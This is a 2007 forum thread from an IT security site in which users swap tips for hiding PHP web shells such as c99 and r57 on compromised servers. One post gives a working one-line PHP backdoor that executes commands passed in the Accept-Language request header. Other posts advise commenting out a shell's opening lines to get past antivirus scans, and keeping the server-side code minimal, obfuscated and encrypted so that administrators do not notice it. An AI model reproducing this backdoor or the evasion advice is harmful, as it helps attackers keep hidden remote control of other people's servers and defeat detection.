|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 84
Members: 0
Total: 84
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Make c99 or r57 less detectable by antivir programs! |
|
Posted: Sun Jun 24, 2007 6:46 pm |
|
|
7777777 |
Regular user |
|
|
Joined: Jun 24, 2007 |
Posts: 8 |
|
|
|
|
|
|
|
Hi! this is a fast tip:
Edit the first lines of your php shell like comentaries and some antivir wont detect them! you can try www.virustotal.com to test.
Regards. |
|
|
|
|
Posted: Mon Jun 25, 2007 5:48 am |
|
|
7777777 |
Regular user |
|
|
Joined: Jun 24, 2007 |
Posts: 8 |
|
|
|
|
|
|
|
So... what shell dou you use then? r57?? |
|
|
|
|
Posted: Mon Jun 25, 2007 6:36 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
In most cases
Code: | <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?> |
Very easy to hide shell like this.r57 and c99 is too big to hide. |
|
|
|
|
Posted: Mon Jun 25, 2007 2:09 pm |
|
|
barr0w |
Regular user |
|
|
Joined: May 30, 2007 |
Posts: 13 |
|
|
|
|
|
|
|
I hear that c99 sucks a lot, but what is a better alternative? I have yet to find something better that has an interface in English. |
|
|
|
|
Posted: Mon Jun 25, 2007 5:16 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
If one shell have interface she is too big to hide on server.Admin find him and look error.log and your hole will be locked. |
|
|
|
|
Posted: Mon Jun 25, 2007 5:23 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Yep, agree with koko. Best shell is, where server-side is minimalistic - only 1-2 lines of code, maybe even somehow obfuscated. And all the nice functionality, which makes this php shell to be userfriendly, is implemented on USER side! Even better - all communications can be encrypted, if serverside and userside scripts are using encryption.
Thats my two cents |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|